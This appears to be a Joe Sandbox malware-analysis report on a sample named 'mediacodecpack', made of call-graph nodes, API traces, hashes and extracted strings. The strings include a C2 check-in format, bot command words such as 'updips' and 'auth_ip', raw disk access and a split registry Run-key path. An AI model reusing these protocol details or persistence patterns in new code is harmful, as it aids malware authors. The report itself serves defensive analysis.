b03659 61430 b0fb20 Mailbox 68 API calls 61429->61430 61430->61428 61432 b0fb20 Mailbox 68 API calls 61431->61432 61433 b02f0a WSAGetLastError 61432->61433 61434 b02f21 61433->61434 61435 b02f41 61433->61435 61436 b02f27 setsockopt 61434->61436 61437 b02f3c 61434->61437 61435->61416 61435->61428 61436->61437 61438 b0fb20 Mailbox 68 API calls 61437->61438 61438->61435 61439->61428 61440->61428 61441->61429 61442->61404 61443->61407 61445 b02de4 61444->61445 61446 b02dca 61444->61446 61448 b02dfc 61445->61448 61450 b02def 61445->61450 61447 b0fb20 Mailbox 68 API calls 61446->61447 61452 b02dcf 61447->61452 61458 b02d39 WSASetLastError WSASend 61448->61458 61451 b0fb20 Mailbox 68 API calls 61450->61451 61451->61452 61452->61009 61453 b02e54 WSASetLastError select 61454 b0950d 69 API calls 61453->61454 61456 b02e0c 61454->61456 61455 b0fb20 68 API calls Mailbox 61455->61456 61456->61452 61456->61453 61456->61455 61457 b02d39 71 API calls 61456->61457 61457->61456 61459 b0950d 69 API calls 61458->61459 61460 b02d6e 61459->61460 61461 b02d82 61460->61461 61462 b02d75 61460->61462 61464 b02d7a 61461->61464 61465 b0fb20 Mailbox 68 API calls 61461->61465 61463 b0fb20 Mailbox 68 API calls 61462->61463 61463->61464 61466 b02d9c 61464->61466 61467 b0fb20 Mailbox 68 API calls 61464->61467 61465->61464 61466->61456 61467->61466 61468 4021bb 61469 4021c8 61468->61469 61470 402223 CopyFileA 61469->61470 61472 402171 61469->61472 61473 4021e0 61469->61473 61470->61472 61471 40d955 OpenSCManagerA 61471->61472 61472->61471 61474 40e09b 61472->61474 61475 401b7c 61476 402277 RegQueryValueExA 61475->61476 61478 b3c80e 61479 b3c812 61478->61479 61482 b0e9ab LoadLibraryA 61479->61482 61480 b3c817 61480->61480 61483 b0e9d4 GetProcAddress 61482->61483 61484 b0ea8e 61482->61484 61485 b0ea87 FreeLibrary 61483->61485 61488 b0e9e8 61483->61488 61484->61480 61485->61484 61486 b0e9fa GetAdaptersInfo 61486->61488 61487 b0ea82 61487->61485 61488->61486 61488->61487 61489 b127c5 _Allocate 60 API 
calls 61488->61489 61489->61488 61490 b0104d 61491 b123b4 __cinit 68 API calls 61490->61491 61492 b01057 61491->61492 61495 b01aa9 InterlockedIncrement 61492->61495 61496 b01ac5 WSAStartup InterlockedExchange 61495->61496 61497 b0105c 61495->61497 61496->61497 61498 4022ff 61499 4022fe 61498->61499 61499->61498 61500 40d0b4 RegCloseKey 61499->61500

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00B34FD0), ref: 00B05E92
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00B05EA9
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EB2
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00B05EC1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EC4
                                                                                        • GetTickCount.KERNEL32 ref: 00B05ED8
                                                                                          • Part of subcall function 00B059FA: _malloc.LIBCMT ref: 00B05A08
                                                                                        • GetVersionExA.KERNEL32(00B34E20), ref: 00B05F05
                                                                                        • _malloc.LIBCMT ref: 00B05F31
                                                                                          • Part of subcall function 00B11FBC: __FF_MSGBANNER.LIBCMT ref: 00B11FD3
                                                                                          • Part of subcall function 00B11FBC: __NMSG_WRITE.LIBCMT ref: 00B11FDA
                                                                                          • Part of subcall function 00B11FBC: RtlAllocateHeap.NTDLL(00830000,00000000,00000001), ref: 00B11FFF
                                                                                        • _malloc.LIBCMT ref: 00B05F41
                                                                                        • _malloc.LIBCMT ref: 00B05F4C
                                                                                        • _malloc.LIBCMT ref: 00B05F57
                                                                                        • _malloc.LIBCMT ref: 00B05F62
                                                                                        • _malloc.LIBCMT ref: 00B05F6D
                                                                                        • _malloc.LIBCMT ref: 00B05F78
                                                                                        • _malloc.LIBCMT ref: 00B05F84
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00B05F9B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FB0
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FB3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FBE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FC1
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B05FF8
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06005
                                                                                        • _malloc.LIBCMT ref: 00B06026
                                                                                        • _malloc.LIBCMT ref: 00B06034
                                                                                        • _malloc.LIBCMT ref: 00B0603B
                                                                                        • _malloc.LIBCMT ref: 00B0605C
                                                                                        • QueryPerformanceCounter.KERNEL32(00000200), ref: 00B06068
                                                                                        • Sleep.KERNELBASE(00000000), ref: 00B06076
                                                                                        • _malloc.LIBCMT ref: 00B06082
                                                                                        • _malloc.LIBCMT ref: 00B06092
                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 00B06104
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0610F
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06120
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat$vZ_
                                                                                        • API String ID: 4273019447-198802956
                                                                                        • Opcode ID: 1945daca0701249a6653d6ca1ecca060697b475809d521d1bb18ba7637410ab3
                                                                                        • Instruction ID: dee37b33783081be53da282c83ad118760777b1af12fe1cb96e0442fddf07b7b
                                                                                        • Opcode Fuzzy Hash: 1945daca0701249a6653d6ca1ecca060697b475809d521d1bb18ba7637410ab3
                                                                                        • Instruction Fuzzy Hash: E871F3B19083809FD320AF38AC46F9F7BE8AF45710F14096DF68897392DFB459458B96

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00B0E9C1
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00B0E9DA
                                                                                        • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00B0E9FF
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B0EA88
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                        • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                        • API String ID: 514930453-3114217049
                                                                                        • Opcode ID: 4887b410d0bbfc53179e643b7f8e6434b0b3a01e9ccc4bd859913c1d0b562632
                                                                                        • Instruction ID: 52dc60678f6d7e395743583a73ef5fbe27805b10651a89a7ea7a59734c93daac
                                                                                        • Opcode Fuzzy Hash: 4887b410d0bbfc53179e643b7f8e6434b0b3a01e9ccc4bd859913c1d0b562632
                                                                                        • Instruction Fuzzy Hash: 5221A571B002099BCB20DBA89884AEEBFF8FF09310F1444E9E558E7281DB30DD45C7A4

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • WSASetLastError.WS2_32(00000000), ref: 00B02BE4
                                                                                        • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 00B02C07
                                                                                          • Part of subcall function 00B0950D: WSAGetLastError.WS2_32(00000000,?,?,00B02A51), ref: 00B0951B
                                                                                        • WSASetLastError.WS2_32 ref: 00B02CD3
                                                                                        • select.WS2_32(?,?,00000000,00000000,00000000), ref: 00B02CE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$Recvselect
                                                                                        • String ID: 3'
                                                                                        • API String ID: 886190287-280543908
                                                                                        • Opcode ID: af923168e95d2733f46d9e61ce04da4b2a8ebdeb435feaa7b67777a452dc1431
                                                                                        • Instruction ID: 96f30f256472b4a9c947c62b4aefe0fc73509705403c427426cde74c0cadc78c
                                                                                        • Opcode Fuzzy Hash: af923168e95d2733f46d9e61ce04da4b2a8ebdeb435feaa7b67777a452dc1431
                                                                                        • Instruction Fuzzy Hash: 20419EB05043019FD720AF64C85976BBFE8EF84354F1049AEE895C76D1EB70D8498B91

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00B0E8C6
                                                                                        • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 00B0E904
                                                                                        • GetLastError.KERNEL32 ref: 00B0E965
                                                                                        • CloseHandle.KERNELBASE(?), ref: 00B0E99C
                                                                                        • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                        • String ID: \\.\PhysicalDrive0
                                                                                        • API String ID: 4026078076-1180397377
                                                                                        • Opcode ID: 4a718df410f9bb2a17f85b5b875f241fd4334e316f743e1b04f5a9fd8b564499
                                                                                        • Instruction ID: 81a910fe0e74bcca47dacb7be929953f9a3160532f7bf7c43c6487eee1664c60
                                                                                        • Opcode Fuzzy Hash: 4a718df410f9bb2a17f85b5b875f241fd4334e316f743e1b04f5a9fd8b564499
                                                                                        • Instruction Fuzzy Hash: 7831A271D00219EBCB24DF99DC84AAEBFF8EF45710F2045AEE515A7280DB709E05CBA0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00B34FD0), ref: 00B05E92
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00B05EA9
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EB2
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00B05EC1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EC4
                                                                                        • GetTickCount.KERNEL32 ref: 00B05ED8
                                                                                        • GetVersionExA.KERNEL32(00B34E20), ref: 00B05F05
                                                                                        • _malloc.LIBCMT ref: 00B05F31
                                                                                        • _malloc.LIBCMT ref: 00B05F41
                                                                                        • _malloc.LIBCMT ref: 00B05F4C
                                                                                        • _malloc.LIBCMT ref: 00B05F57
                                                                                        • _malloc.LIBCMT ref: 00B05F62
                                                                                        • _malloc.LIBCMT ref: 00B05F6D
                                                                                        • _malloc.LIBCMT ref: 00B05F78
                                                                                        • _malloc.LIBCMT ref: 00B05F84
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00B05F9B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FB0
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FB3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FBE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FC1
                                                                                        • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat$vZ_
                                                                                        • API String ID: 2374473808-198802956
                                                                                        • Opcode ID: 0e614427cd153a1f00e898d42650300a3997a02cf9d948799dbd077ef53cfda0
                                                                                        • Instruction ID: ba1582ed7252187a4fb51f0009f9df4e19a82a7ebc2cf3d906504cc6ea268bbd
                                                                                        • Opcode Fuzzy Hash: 0e614427cd153a1f00e898d42650300a3997a02cf9d948799dbd077ef53cfda0
                                                                                        • Instruction Fuzzy Hash: BEA136719083409FD320AF78AC45B9BBBE4AF59310F5409AEF688D7292DF749806CBD5

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • RtlInitializeCriticalSection.NTDLL(00B34FD0), ref: 00B05E92
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00B05EA9
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EB2
                                                                                        • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00B05EC1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B05EC4
                                                                                        • GetTickCount.KERNEL32 ref: 00B05ED8
                                                                                        • GetVersionExA.KERNEL32(00B34E20), ref: 00B05F05
                                                                                        • _malloc.LIBCMT ref: 00B05F31
                                                                                        • _malloc.LIBCMT ref: 00B05F41
                                                                                        • _malloc.LIBCMT ref: 00B05F4C
                                                                                        • _malloc.LIBCMT ref: 00B05F57
                                                                                        • _malloc.LIBCMT ref: 00B05F62
                                                                                        • _malloc.LIBCMT ref: 00B05F6D
                                                                                        • _malloc.LIBCMT ref: 00B05F78
                                                                                        • _malloc.LIBCMT ref: 00B05F84
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00B05F9B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FA4
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FB0
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FB3
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00B05FBE
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00B05FC1
                                                                                        • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountCriticalInitializeSectionTickVersion
                                                                                        • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$sprintf$strcat$vZ_
                                                                                        • API String ID: 2374473808-198802956
                                                                                        • Opcode ID: 47a569bfe83c3dfadf1be9d427a4329d06f232b7dfe9eadfc3700e47bfccd247
                                                                                        • Instruction ID: f29d3c9468351a9bc7caa4a2ecdf8b5489369182596a8bd0e42aaf7148e84e52
                                                                                        • Opcode Fuzzy Hash: 47a569bfe83c3dfadf1be9d427a4329d06f232b7dfe9eadfc3700e47bfccd247
                                                                                        • Instruction Fuzzy Hash: 1D71F6B18083909FD320AF78AC45B9B7FE4AF56300F14089DF58897392DFB45946CB96

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(0000EA60), ref: 00B06104
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0610F
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06120
                                                                                          • Part of subcall function 00B127C5: _malloc.LIBCMT ref: 00B127DD
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B064A3
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B064B4
                                                                                        • _malloc.LIBCMT ref: 00B0653B
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B0654D
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06559
                                                                                        • _malloc.LIBCMT ref: 00B0662A
                                                                                        • _strtok.LIBCMT ref: 00B0665B
                                                                                        • _swscanf.LIBCMT ref: 00B06672
                                                                                        • _strtok.LIBCMT ref: 00B06689
                                                                                        • _free.LIBCMT ref: 00B06695
                                                                                        • Sleep.KERNEL32(000007D0), ref: 00B06779
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B067FF
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B06811
                                                                                          • Part of subcall function 00B0873B: __EH_prolog.LIBCMT ref: 00B08740
                                                                                          • Part of subcall function 00B0873B: RtlEnterCriticalSection.NTDLL(00000020), ref: 00B087BB
                                                                                          • Part of subcall function 00B0873B: RtlLeaveCriticalSection.NTDLL(00000020), ref: 00B087D9
                                                                                        • _sprintf.LIBCMT ref: 00B0689B
                                                                                        • RtlEnterCriticalSection.NTDLL(00000020), ref: 00B06960
                                                                                        • RtlLeaveCriticalSection.NTDLL(00000020), ref: 00B06994
                                                                                          • Part of subcall function 00B05C11: _malloc.LIBCMT ref: 00B05C1F
                                                                                        • API ID: CriticalSection$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                        • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                        • API String ID: 753742866-2823103634
                                                                                        • Opcode ID: 82d25da30ca7329b5888b2c88be42b3f34131e7c28032d4e2c516c98bb99ca2c
                                                                                        • Instruction ID: 0b97b5ff12135e4a84c4426a3fdf017e8d9bc416e22946631ce48653363a7229
                                                                                        • Opcode Fuzzy Hash: 82d25da30ca7329b5888b2c88be42b3f34131e7c28032d4e2c516c98bb99ca2c
                                                                                        • Instruction Fuzzy Hash: 341210722083819FD3349B24D852BAFBBE4EF86710F1448ADF589972D2EF709945CB52

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B01D11
                                                                                        • GetLastError.KERNEL32 ref: 00B01D23
                                                                                          • Part of subcall function 00B01712: __EH_prolog.LIBCMT ref: 00B01717
                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B01D59
                                                                                        • GetLastError.KERNEL32 ref: 00B01D6B
                                                                                        • __beginthreadex.LIBCMT ref: 00B01DB1
                                                                                        • GetLastError.KERNEL32 ref: 00B01DC6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B01DDD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B01DEC
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00B01E14
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B01E1B
                                                                                        • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                        • String ID: thread$thread.entry_event$thread.exit_event
                                                                                        • API String ID: 831262434-3017686385
                                                                                        • Opcode ID: f981165149560189aaf44e35c3ea152e94e71390406e8f5aa4e240c79d7dd4fa
                                                                                        • Instruction ID: 7efffc41cb8992f231c5c5d10934b0000113d5d3c2d65fccef4ead96663f93e1
                                                                                        • Opcode Fuzzy Hash: f981165149560189aaf44e35c3ea152e94e71390406e8f5aa4e240c79d7dd4fa
                                                                                        • Instruction Fuzzy Hash: AE315971A007019FD720EF28CC48B6BBBE4EF84750F1049A9F8558B2A1DB309D4ACB92

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B04D8B
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B04DB7
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B04DC3
                                                                                          • Part of subcall function 00B04BED: __EH_prolog.LIBCMT ref: 00B04BF2
                                                                                          • Part of subcall function 00B04BED: InterlockedExchange.KERNEL32(?,00000000), ref: 00B04CF2
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B04E93
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B04E99
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B04EA0
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B04EA6
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B050A7
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B050AD
                                                                                        • RtlEnterCriticalSection.NTDLL(00B34FD0), ref: 00B050B8
                                                                                        • RtlLeaveCriticalSection.NTDLL(00B34FD0), ref: 00B050C1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                        • String ID:
                                                                                        • API String ID: 2062355503-0
                                                                                        • Opcode ID: ea6193fe4b32ce4e535fcf5c14ce8f677d26cd491e319feba7c50fbe2dfcac5a
                                                                                        • Instruction ID: 658e767cf4d2ab14fbccca08145016babdbc122e28803d43e8c3d11905000566
                                                                                        • Opcode Fuzzy Hash: ea6193fe4b32ce4e535fcf5c14ce8f677d26cd491e319feba7c50fbe2dfcac5a
                                                                                        • Instruction Fuzzy Hash: A9B14A71D0425D9FEF25DFA0D845BEEBBF4AF04314F24409AE40966281DBB46A49CF91

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 491 401301-40135e FindResourceA 492 401360-401362 491->492 493 401367-40137d SizeofResource 491->493 496 401538-40153c 492->496 494 401386-4013fe LoadResource LockResource GlobalAlloc call 402490 * 2 493->494 495 40137f-401381 493->495 501 401407-40140b 494->501 495->496 502 40140d-40141d 501->502 503 40141f-401428 GetTickCount 501->503 502->501 505 401491-401499 503->505 506 40142a-40142e 503->506 507 4014a2-4014a8 505->507 508 401430-401438 506->508 509 40148f 506->509 510 4014f0-401525 GlobalAlloc call 401000 507->510 511 4014aa-4014e8 507->511 512 401441-401447 508->512 509->510 519 40152a-401535 510->519 513 4014ea 511->513 514 4014ee 511->514 516 401449-401485 512->516 517 40148d 512->517 513->514 514->507 520 401487 516->520 521 40148b 516->521 517->506 519->496 520->521 521->512
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                        • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3019604839-3916222277
                                                                                        • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                        • Instruction ID: 779852d327d389dbbb2f1b261a2bb7141e3a4eae573781fe7d13a424a4f3f89b
                                                                                        • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                        • Instruction Fuzzy Hash: F1811075D04258DFDF01CFE8D985AEEBBB0BF09305F1400AAE581B7262C3385A84DB69

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 523 b026db-b02726 RtlEnterCriticalSection 524 b02728-b02736 CreateWaitableTimerA 523->524 525 b0277e-b02781 523->525 528 b02738-b02756 GetLastError call b0fb20 call b01712 524->528 529 b0275b-b02778 SetWaitableTimer 524->529 526 b02783-b02798 call b127c5 525->526 527 b027d5-b027f0 RtlLeaveCriticalSection 525->527 534 b027ca 526->534 535 b0279a-b027ac call b127c5 526->535 528->529 529->525 538 b027cc-b027d0 call b06e07 534->538 541 b027b9 535->541 542 b027ae-b027b7 535->542 538->527 543 b027bb-b027c3 call b01cf8 541->543 542->543 545 b027c8 543->545 545->538
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00B02706
                                                                                        • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 00B0272B
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B23173), ref: 00B02738
                                                                                          • Part of subcall function 00B01712: __EH_prolog.LIBCMT ref: 00B01717
                                                                                        • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 00B02778
                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00B027D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                        • String ID: timer
                                                                                        • API String ID: 4293676635-1792073242
                                                                                        • Opcode ID: d4abd834cd8378b44c0c312c2f253315ab407c38e7753d935cfe115658d1ff15
                                                                                        • Instruction ID: b155cfd89b986305a2d930b422de4946e22c4cd7c40f41a8e4e9b78a4943e2e7
                                                                                        • Opcode Fuzzy Hash: d4abd834cd8378b44c0c312c2f253315ab407c38e7753d935cfe115658d1ff15
                                                                                        • Instruction Fuzzy Hash: B031ADB1404705AFD320DF25D888B66BBE8FB48B65F004A6EF819836C0DB70EC55CBA5

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 574 401e4e-401e4f 575 401e51-401e54 574->575 576 401e22-401e37 574->576 578 401e56-401e7e LoadLibraryExA 575->578 579 401eca-401ed6 575->579 577 40dc1b-40dc22 576->577 580 40de67 577->580 578->579 582 401dd0 578->582 581 40207f-40d1c2 579->581 586 40de6a 580->586 588 40d9ae 581->588 583 401dd6-402282 582->583 584 401f6b-401fa1 582->584 583->580 584->581 584->588 586->586 588->577
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID: Curr$entV$ersi$on\R$ows\
                                                                                        • API String ID: 1029625771-1474489434
                                                                                        • Opcode ID: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                        • Instruction ID: f023023372e99afa5c1116a4d80dcbe190962e31142eb026a9c01bd4ea8a2df4
                                                                                        • Opcode Fuzzy Hash: f444551602b2b86e4a4a20a609321a93c0450eb734b73b7cbcf43e92de4f6f8f
                                                                                        • Instruction Fuzzy Hash: 9D219270D14625CFCB04DFA8CD85AEDB7B1BB05B00F14856AE0127B7E1C378A842DB4A

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 673 b01ba7-b01bcf call b22a10 RtlEnterCriticalSection 676 b01bd1 673->676 677 b01be9-b01bf7 RtlLeaveCriticalSection call b0d334 673->677 678 b01bd4-b01be0 call b01b79 676->678 679 b01bfa-b01c20 RtlEnterCriticalSection 677->679 685 b01be2-b01be7 678->685 686 b01c55-b01c6e RtlLeaveCriticalSection 678->686 681 b01c34-b01c36 679->681 683 b01c22-b01c2f call b01b79 681->683 684 b01c38-b01c43 681->684 688 b01c45-b01c4b 683->688 691 b01c31 683->691 684->688 685->677 685->678 688->686 690 b01c4d-b01c51 688->690 690->686 691->681
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00B01BAC
                                                                                        • RtlEnterCriticalSection.NTDLL ref: 00B01BBC
                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00B01BEA
                                                                                        • RtlEnterCriticalSection.NTDLL ref: 00B01C13
                                                                                        • RtlLeaveCriticalSection.NTDLL ref: 00B01C56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 1633115879-0
                                                                                        • Opcode ID: 0797ae3b129d22d26ff88eead8a594f1850ac3dcfa41305958481c222747fb87
                                                                                        • Instruction ID: 47b73458fedac41fd924f2cf9ca3ac754458f93d7e945922242c93abed4c7b20
                                                                                        • Opcode Fuzzy Hash: 0797ae3b129d22d26ff88eead8a594f1850ac3dcfa41305958481c222747fb87
